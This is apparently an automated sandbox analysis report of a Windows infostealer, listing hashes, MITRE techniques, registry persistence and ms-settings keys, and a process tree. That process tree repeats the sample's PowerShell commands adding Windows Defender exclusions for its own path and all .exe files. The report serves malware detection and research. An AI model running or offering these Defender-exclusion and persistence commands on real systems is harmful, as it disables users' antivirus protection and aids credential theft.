3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4

Analysis

max time kernel
149s
max time network
150s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
16/05/2024, 13:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
Size

169KB
MD5

fc505b7730fbbdead6d352aba01d6a18
SHA1

aa28e00c57c2a9a8638c777bb90f1f1528d359bb
SHA256

3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4
SHA512

7a61ec10f25cd40fe7c596d4afc1adfdf8497a5595768891372de12f9a44b176ecaa59cd84046e46d1277d30701d1bc68e8f8ed3606bcc535967764a7c1ae14d
SSDEEP

3072:EkMXuXhNC38S7gzQ/cqD4UT6R27Xrcrc0D83SOYrbnBI5a36rERRQSIpiJrenYPG:ayzQ/4WXwrJn9rbnBbLRRQSIpiJrenYe

Score

8^/10

execution persistence spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4296	powershell.exe
3732	powershell.exe
4880	powershell.exe
2304	powershell.exe
4920	powershell.exe
5016	powershell.exe
4552	powershell.exe
1336	powershell.exe
1172	powershell.exe
3972	powershell.exe
2452	powershell.exe
3224	powershell.exe
4644	powershell.exe
2020	powershell.exe
3060	powershell.exe
2320	powershell.exe
2984	powershell.exe
2220	powershell.exe
2328	powershell.exe
1496	powershell.exe
2692	powershell.exe
1660	powershell.exe
2956	powershell.exe
3596	powershell.exe
1848	powershell.exe
2984	powershell.exe
2528	powershell.exe
2068	powershell.exe
1436	powershell.exe
4236	powershell.exe
428	powershell.exe
3596	powershell.exe
2812	powershell.exe
4984	powershell.exe
3632	powershell.exe
3204	powershell.exe
1340	powershell.exe
4272	powershell.exe
776	powershell.exe
3872	powershell.exe
1692	powershell.exe
2136	powershell.exe
3408	powershell.exe
1624	powershell.exe
2140	powershell.exe
4588	powershell.exe
4704	powershell.exe
4568	powershell.exe
3920	powershell.exe
5080	powershell.exe
2320	powershell.exe
2368	powershell.exe
2044	powershell.exe
4572	powershell.exe
3216	powershell.exe
3624	powershell.exe
4868	powershell.exe
4904	powershell.exe
4728	powershell.exe
1532	powershell.exe
4744	powershell.exe
1460	powershell.exe
3252	powershell.exe
4704	powershell.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe"	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\ms-settings\shell\open\command	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\ms-settings	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\ms-settings\shell	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
Key created	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\ms-settings\shell\open	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\ms-settings\shell\open\command\	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
1764	powershell.exe
2984	powershell.exe
1764	powershell.exe
2984	powershell.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
1172	powershell.exe
2060	powershell.exe
1172	powershell.exe
2060	powershell.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
3224	powershell.exe
2140	powershell.exe
3224	powershell.exe
2140	powershell.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
4744	powershell.exe
1460	powershell.exe
4744	powershell.exe
1460	powershell.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
2044	powershell.exe
2044	powershell.exe
384	powershell.exe
384	powershell.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
3596	powershell.exe
3596	powershell.exe
2256	powershell.exe
2256	powershell.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
4588	powershell.exe
2580	powershell.exe
2580	powershell.exe
4588	powershell.exe
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
4272	powershell.exe
4552	powershell.exe
4272	powershell.exe
4552	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
Token: SeDebugPrivilege	1764	powershell.exe
Token: SeDebugPrivilege	2984	powershell.exe
Token: SeDebugPrivilege	1172	powershell.exe
Token: SeDebugPrivilege	2060	powershell.exe
Token: SeDebugPrivilege	3224	powershell.exe
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeDebugPrivilege	4744	powershell.exe
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	384	powershell.exe
Token: SeDebugPrivilege	3596	powershell.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeDebugPrivilege	4588	powershell.exe
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeDebugPrivilege	4272	powershell.exe
Token: SeDebugPrivilege	4552	powershell.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	2068	powershell.exe
Token: SeDebugPrivilege	2116	powershell.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeDebugPrivilege	2984	powershell.exe
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	4296	powershell.exe
Token: SeDebugPrivilege	776	powershell.exe
Token: SeDebugPrivilege	4704	powershell.exe
Token: SeDebugPrivilege	4568	powershell.exe
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeDebugPrivilege	4580	powershell.exe
Token: SeDebugPrivilege	1436	powershell.exe
Token: SeDebugPrivilege	3252	powershell.exe
Token: SeDebugPrivilege	3732	powershell.exe
Token: SeDebugPrivilege	1848	powershell.exe
Token: SeDebugPrivilege	4796	powershell.exe
Token: SeDebugPrivilege	4984	powershell.exe
Token: SeDebugPrivilege	4880	powershell.exe
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeDebugPrivilege	3204	powershell.exe
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	3920	powershell.exe
Token: SeDebugPrivilege	1692	powershell.exe
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeDebugPrivilege	2984	powershell.exe
Token: SeDebugPrivilege	1516	powershell.exe
Token: SeDebugPrivilege	3216	powershell.exe
Token: SeDebugPrivilege	3672	powershell.exe
Token: SeDebugPrivilege	3624	powershell.exe
Token: SeDebugPrivilege	4644	powershell.exe
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeDebugPrivilege	1144	powershell.exe
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeDebugPrivilege	3408	powershell.exe
Token: SeDebugPrivilege	1496	powershell.exe
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeDebugPrivilege	5080	powershell.exe
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	1624	powershell.exe
Token: SeDebugPrivilege	2452	powershell.exe
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeDebugPrivilege	4600	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2260 wrote to memory of 4892	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	82
PID 2260 wrote to memory of 4892	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	82
PID 2260 wrote to memory of 2796	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	84
PID 2260 wrote to memory of 2796	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	84
PID 4892 wrote to memory of 1764	4892	cmd.exe	86
PID 4892 wrote to memory of 1764	4892	cmd.exe	86
PID 2796 wrote to memory of 2984	2796	cmd.exe	87
PID 2796 wrote to memory of 2984	2796	cmd.exe	87
PID 2260 wrote to memory of 4608	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	91
PID 2260 wrote to memory of 4608	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	91
PID 2260 wrote to memory of 4672	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	93
PID 2260 wrote to memory of 4672	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	93
PID 4672 wrote to memory of 2060	4672	cmd.exe	95
PID 4672 wrote to memory of 2060	4672	cmd.exe	95
PID 4608 wrote to memory of 1172	4608	cmd.exe	96
PID 4608 wrote to memory of 1172	4608	cmd.exe	96
PID 2260 wrote to memory of 2224	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	97
PID 2260 wrote to memory of 2224	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	97
PID 2260 wrote to memory of 4860	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	99
PID 2260 wrote to memory of 4860	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	99
PID 2224 wrote to memory of 3224	2224	cmd.exe	101
PID 2224 wrote to memory of 3224	2224	cmd.exe	101
PID 4860 wrote to memory of 2140	4860	cmd.exe	102
PID 4860 wrote to memory of 2140	4860	cmd.exe	102
PID 2260 wrote to memory of 1680	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	103
PID 2260 wrote to memory of 1680	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	103
PID 2260 wrote to memory of 4880	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	105
PID 2260 wrote to memory of 4880	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	105
PID 1680 wrote to memory of 4744	1680	cmd.exe	107
PID 1680 wrote to memory of 4744	1680	cmd.exe	107
PID 4880 wrote to memory of 1460	4880	cmd.exe	108
PID 4880 wrote to memory of 1460	4880	cmd.exe	108
PID 2260 wrote to memory of 4576	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	109
PID 2260 wrote to memory of 4576	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	109
PID 2260 wrote to memory of 744	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	111
PID 2260 wrote to memory of 744	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	111
PID 4576 wrote to memory of 2044	4576	cmd.exe	113
PID 4576 wrote to memory of 2044	4576	cmd.exe	113
PID 744 wrote to memory of 384	744	cmd.exe	114
PID 744 wrote to memory of 384	744	cmd.exe	114
PID 2260 wrote to memory of 3996	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	115
PID 2260 wrote to memory of 3996	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	115
PID 2260 wrote to memory of 2116	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	117
PID 2260 wrote to memory of 2116	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	117
PID 3996 wrote to memory of 3596	3996	cmd.exe	119
PID 3996 wrote to memory of 3596	3996	cmd.exe	119
PID 2116 wrote to memory of 2256	2116	cmd.exe	120
PID 2116 wrote to memory of 2256	2116	cmd.exe	120
PID 2260 wrote to memory of 4748	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	121
PID 2260 wrote to memory of 4748	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	121
PID 2260 wrote to memory of 4312	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	123
PID 2260 wrote to memory of 4312	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	123
PID 4748 wrote to memory of 4588	4748	cmd.exe	125
PID 4748 wrote to memory of 4588	4748	cmd.exe	125
PID 4312 wrote to memory of 2580	4312	cmd.exe	126
PID 4312 wrote to memory of 2580	4312	cmd.exe	126
PID 2260 wrote to memory of 3712	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	127
PID 2260 wrote to memory of 3712	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	127
PID 2260 wrote to memory of 4296	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	129
PID 2260 wrote to memory of 4296	2260	3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe	129
PID 3712 wrote to memory of 4272	3712	cmd.exe	131
PID 3712 wrote to memory of 4272	3712	cmd.exe	131
PID 4296 wrote to memory of 4552	4296	cmd.exe	132
PID 4296 wrote to memory of 4552	4296	cmd.exe	132

C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
"C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe"
1⤵
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2260
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4892
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1764
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2984
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1172
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2060
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2224
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3224
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2140
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1680
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4744
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4880
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1460
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2044
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:744
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:384
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3996
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3596
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2256
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4588
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2580
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3712
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\3cbfe1e9bba7469a3fd606dcf77b047570f4b9a37c02b055f2ab0416773424b4.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4272
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4296
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4552
- C:\Windows\System32\cmd.exe
